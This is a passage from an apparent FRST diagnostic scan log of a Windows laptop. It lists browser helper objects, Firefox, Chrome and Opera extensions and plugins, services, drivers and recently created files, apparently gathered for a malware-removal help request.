BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-19]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 a0l0qh6b; C:\Windows\System32\Drivers\a0l0qh6b.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 15:28 - 2019-11-19 15:32 - 000043356 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-19 14:43 - 2019-11-19 14:43 - 000004629 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-19 01:50 - 2019-11-19 15:23 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:50 - 2019-11-19 15:23 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:39 - 2019-11-19 14:36 - 000000000 ____D C:\Users\Vladana\Desktop\Old
